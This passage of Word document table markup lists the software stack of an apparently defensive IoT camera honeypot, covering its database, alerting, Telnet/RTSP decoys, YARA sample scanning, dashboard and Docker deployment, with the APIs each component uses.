          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">FastAPI, Request, middleware, HTMLResponse, JSONResponse, uvicorn.Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">python-multipart 0.0.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Form parsing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Camera login form and firmware upload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">await request.form()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">psycopg2-binary 2.9.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Database driver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Connection pool and parameterised queries to PostgreSQL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">psycopg2.pool.ThreadedConnectionPool, cursor.execute()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">PostgreSQL 16 (postgres:16-alpine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Unified event store, intelligence tables, GIN full-text index, compatibility views.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">init.sql, JSONB, to_tsvector, ON CONFLICT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">redis-py 5.0.4 / Redis 7.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">In-memory store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Shared Device State, honeybot:events pub/sub and heartbeats.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Redis.hset/hgetall, publish, setex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">geoip2 4.8.0 + DB-IP City Lite / MaxMind GeoLite2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Geolocation (offline)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">City, country and coordinates for public attacker IPs without calling an online API.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">geoip2.database.Reader.city()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Telegram Bot API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Messaging API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Instant alert messages to the analyst's phone.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTPS POST /bot&lt;token&gt;/sendMessage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">smtplib / email (Python standard library)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">E-mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">HTML + text alert e-mails over STARTTLS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">SMTP.starttls(), login(), sendmail(), MIMEMultipart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">PyYAML 6.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Alert thresholds and de-duplication window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">yaml.safe_load(alerts.yaml)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">asyncio (Python standard library)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Asynchronous I/O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Telnet and RTSP servers handling many idle attacker sockets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">asyncio.start_server, StreamReader.readuntil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">cryptography 42.0.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Self-signed certificate for the HTTPS camera panel.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">x509.CertificateBuilder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">React 19 + TypeScript 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Front-end framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Single-page SOC dashboard with eleven pages, built to static files served by Nginx.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">TanStack Router (file routes), TanStack Query (useQuery), native WebSocket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Recharts 2.15 + d3-geo 3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Charts / map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Timeline, protocol and severity charts; offline world map with heat layer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">AreaChart, BarChart, geoNaturalEarth1, geoPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Nginx 1.26 (nginx:1.26-alpine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Web server / reverse proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Serves the dashboard, proxies /api/, basic auth and rate limiting.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">auth_basic, limit_req_zone, proxy_pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Docker Engine + Docker Compose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Orchestration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Builds and runs the 13 services on four networks with health checks and hardening.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">docker-compose.yml, Dockerfile.honeypot, .api, .dashboard, .firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">yara-python 4.5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Malware classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Scans quarantined samples with the IoT rule set.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">yara.compile(), rules.match(data=…)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">reportlab 4.2.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">PDF generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Threat reports with tables and embedded charts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">SimpleDocTemplate, Table, Drawing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">stix2 3.0.1 (tests only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Standards validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Validates the STIX 2.1 export against the OASIS specification.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">stix2.parse()</w:t>
            </w:r>
          </w:p>
